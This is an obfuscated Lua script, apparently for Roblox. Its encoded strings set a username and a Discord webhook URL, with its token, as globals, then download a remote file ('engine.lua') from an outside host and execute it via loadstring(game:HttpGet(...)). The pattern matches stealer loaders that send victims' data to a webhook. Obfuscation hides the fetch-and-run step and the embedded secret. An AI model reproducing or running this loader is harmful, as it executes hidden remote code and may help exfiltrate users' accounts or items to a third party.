--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v92=v5(v83,v19);v19=nil;return v92;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/(((1640 -(1523 + 114)) -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-1) -(v32-(932 -(857 + 67 + 7)))) + (569 -(367 + 201)))) ;return v85-(v85%(928 -(214 + 713))) ;end end else local v86=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (878 -(282 + 595))) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23()local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(118 -(32 + 85))) then return (v41 * (16777566 -(64 + 23 + 263))) + (v40 * ((255265 -191039) + 1310)) + (v39 * (57 + 199)) + v38 ;end if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (9 -5) ;v37=1;end end end local function v24()local v42=(780 + 172) -(802 + 150) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(2 -(773 -(201 + 571)))) then v45=1 -0 ;v46=(v20(v44,1 + 0 ,1017 -((2053 -(116 + 1022)) + 82) ) * ((5 -3)^(19 + 13))) + v43 ;v42=2 -0 ;end if (v42==(1190 -(1069 + 118))) then if (v47==0) then if (v46==((0 -0) -0)) then return v48 * (0 -(0 + 0)) ;else v47=1 + 0 ;v45=0 -0 ;end elseif (v47==(2031 + 16)) then return ((v46==(791 -((1343 -975) + 423))) and (v48 * ((3 -2)/0))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/(((71 -51) -(10 + 8))^(199 -147)))) ;end if (v42==(442 -(416 + 26))) then v43=v23();v44=v23();v42=1;end if (v42==(6 -4)) then v47=v20(v44,10 + 11 ,54 -23 );v48=((v20(v44,470 -(145 + 293) )==1) and  -(431 -(44 + (1245 -(814 + 45))))) or (1487 -(998 + 488)) ;v42=1 + 2 ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v66=1 + 0 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (1~=v52) then else local v90=0;while true do if (v90==0) then v55=nil;v56=nil;v90=1;end if (v90==(1 -0)) then v52=2 -0 ;break;end end end if (3~=v52) then else v59=nil;while true do if (v53==(1787 -(599 + 1185))) then for v99=1,v23() do v55[v99-(1 + 0) ]=v28();end return v57;end if ((0 + 0)==v53) then v54={};v55={};v56={};v53=575 -(507 + 67) ;end if (v53~=2) then else local v97=1749 -(1013 + 736) ;while true do if (v97==(0 + 0)) then for v108=1,v58 do local v109=0 -0 ;local v110;local v111;local v112;local v113;while true do if (v109~=(0 -0)) then else v110=867 -(550 + 317) ;v111=nil;v109=1;end if (v109==(1 -0)) then v112=nil;v113=nil;v109=2;end if (2==v109) then while true do if (v110==0) then v111=0;v112=nil;v110=1 -0 ;end if (v110==1) then v113=nil;while true do if (v111==0) then local v166=0;while true do if ((2 -1)==v166) then v111=1;break;end if ((285 -(134 + 151))~=v166) then else v112=v21();v113=nil;v166=1;end end end if (1==v111) then if (v112==(1666 -(970 + 695))) then v113=v21()~=(0 -0) ;elseif (v112==(1992 -(582 + 1408))) then v113=v24();elseif (v112==(10 -7)) then v113=v25();end v59[v108]=v113;break;end end break;end end break;end end end v57[3]=v21();v97=1;end if (1==v97) then for v114=1,v23() do local v115=0;local v116;local v117;local v118;while true do if (v115==0) then local v160=0 -0 ;while true do if (v160==1) then v115=1;break;end if (v160==(0 -0)) then v116=0;v117=nil;v160=1825 -(1195 + 629) ;end end end if (v115==(1 -0)) then v118=nil;while true do if ((241 -(187 + 54))~=v116) then else local v165=780 -(162 + 618) ;while true do if (v165==(1 + 0)) then v116=1 + 0 ;break;end if (v165~=0) then else v117=0;v118=nil;v165=1 -0 ;end end end if (v116==(1 -0)) then while true do if (v117~=(0 + 0)) then else v118=v21();if (v20(v118,1,1)==(1636 -(1373 + 263))) then local v168=0;local v169;local v170;local v171;local v172;local v173;while true do if (v168~=(1001 -(451 + 549))) then else v171=nil;v172=nil;v168=1 + 1 ;end if (v168==(0 -0)) then v169=0 -0 ;v170=nil;v168=1385 -(746 + 638) ;end if (2==v168) then v173=nil;while true do if (v169~=1) then else v172=nil;v173=nil;v169=1 + 1 ;end if (v169~=0) then else local v174=0 -0 ;while true do if (v174~=(342 -(218 + 123))) then else v169=1582 -(1535 + 46) ;break;end if (v174~=(0 + 0)) then else v170=0;v171=nil;v174=1 + 0 ;end end end if (v169==(562 -(306 + 254))) then while true do if (v170==0) then local v175=0;while true do if (v175==(1 + 0)) then v170=1;break;end if (v175==(0 -0)) then v171=v20(v118,1469 -(899 + 568) ,2 + 1 );v172=v20(v118,9 -5 ,609 -(268 + 335) );v175=291 -(60 + 230) ;end end end if (v170==(573 -(426 + 146))) then local v176=0 + 0 ;while true do if (v176==(1457 -(282 + 1174))) then v170=813 -(569 + 242) ;break;end if (v176==0) then v173={v22(),v22(),nil,nil};if (v171==(0 + 0)) then local v181=1024 -(706 + 318) ;local v182;while true do if ((1251 -(721 + 530))==v181) then v182=1271 -(945 + 326) ;while true do if (0==v182) then v173[3]=v22();v173[4]=v22();break;end end break;end end elseif (v171==1) then v173[3]=v23();elseif (v171==2) then v173[3]=v23() -(2^(39 -23)) ;elseif (v171~=3) then else local v191=0 + 0 ;local v192;local v193;while true do if (v191==(701 -(271 + 429))) then while true do if (v192==(0 + 0)) then v193=0;while true do if (v193~=0) then else v173[1503 -(1408 + 92) ]=v23() -(2^(1102 -(461 + 625))) ;v173[1292 -(993 + 295) ]=v22();break;end end break;end end break;end if (v191~=0) then else v192=0 + 0 ;v193=nil;v191=1172 -(418 + 753) ;end end end v176=1 + 0 ;end end end if (v170==2) then local v177=0;while true do if (v177~=1) then else v170=3;break;end if (v177==0) then if (v20(v172,1,1)==1) then v173[1 + 1 ]=v59[v173[1 + 1 ]];end if (v20(v172,1 + 1 ,531 -(406 + 123) )==(1770 -(1749 + 20))) then v173[1 + 2 ]=v59[v173[3]];end v177=1;end end end if (v170==3) then if (v20(v172,3,3)==(1323 -(1249 + 73))) then v173[2 + 2 ]=v59[v173[1149 -(466 + 679) ]];end v54[v114]=v173;break;end end break;end end break;end end end break;end end break;end end break;end end end v53=3;break;end end end if (v53~=1) then else local v98=0 -0 ;while true do if (v98==(0 -0)) then local v107=0;while true do if (v107==(1901 -(106 + 1794))) then v98=1 + 0 ;break;end if (v107~=(0 + 0)) then else v57={v54,v55,nil,v56};v58=v23();v107=1;end end end if (v98~=1) then else v59={};v53=2;break;end end end end break;end if (v52~=0) then else v53=0;v54=nil;v52=585 -(57 + 527) ;end if (v52==(1429 -(41 + 1386))) then local v91=103 -(17 + 86) ;while true do if (v91~=0) then else v57=nil;v58=nil;v91=1;end if (1~=v91) then else v52=3;break;end end end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=5) then if (v81<=2) then if (v81<=0) then local v101=0;local v102;local v103;while true do if (v101==0) then v102=v80[2];v103=v78[v80[3]];v101=1;end if (1==v101) then v78[v102 + 1 ]=v103;v78[v102]=v103[v80[4]];break;end end elseif (v81==1) then v78[v80[2]]=v80[3];else local v121=0;local v122;local v123;local v124;local v125;while true do if (v121==1) then v73=(v124 + v122) -1 ;v125=0;v121=2;end if (v121==2) then for v162=v122,v73 do v125=v125 + 1 ;v78[v162]=v123[v125];end break;end if (v121==0) then v122=v80[2];v123,v124=v71(v78[v122](v13(v78,v122 + 1 ,v80[3])));v121=1;end end end elseif (v81<=3) then do return;end elseif (v81==4) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v78[v80[2]]=v62[v80[3]];end elseif (v81<=8) then if (v81<=6) then local v104=v80[2];v78[v104]=v78[v104](v13(v78,v104 + 1 ,v73));elseif (v81==7) then v62[v80[3]]=v78[v80[2]];else v78[v80[2]]();end elseif (v81<=10) then if (v81>9) then local v130;local v131,v132;local v133;local v134;v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v134=v80[2];v133=v78[v80[3]];v78[v134 + 1 ]=v133;v78[v134]=v133[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v134=v80[2];v131,v132=v71(v78[v134](v13(v78,v134 + 1 ,v80[3])));v73=(v132 + v134) -1 ;v130=0;for v154=v134,v73 do v130=v130 + 1 ;v78[v154]=v131[v130];end v72=v72 + 1 ;v80=v68[v72];v134=v80[2];v78[v134]=v78[v134](v13(v78,v134 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];else for v157=v80[2],v80[3] do v78[v157]=nil;end end elseif (v81==11) then v72=v80[3];else v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v72=v80[3];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030B3O004269676D61736B6F743732030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F6A616E65712E73706163652F656E67696E652E6C756103083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313437332O343136373534322O39323933382F42454D7434445763526D306C51576A36315A41786A4C494E496249783537434C515831365354736C4454612O34557A586F64454F7071744D6D3966705A4D77364D6A7A42001C3O0012013O00014O0009000100013O0026043O00020001000100040B3O00020001001201000100013O002604000100110001000200040B3O00110001001201000200043O00120A000200033O00122O000200053O00122O000300063O00202O00030003000700122O000500086O000300056O00023O00024O00020001000100044O001B0001002604000100050001000100040B3O00050001001201000200043O00120C000200093O00122O0002000B3O00122O0002000A3O00122O000100023O00044O0005000100040B3O001B000100040B3O000200012O00033O00017O00",v9(),...);
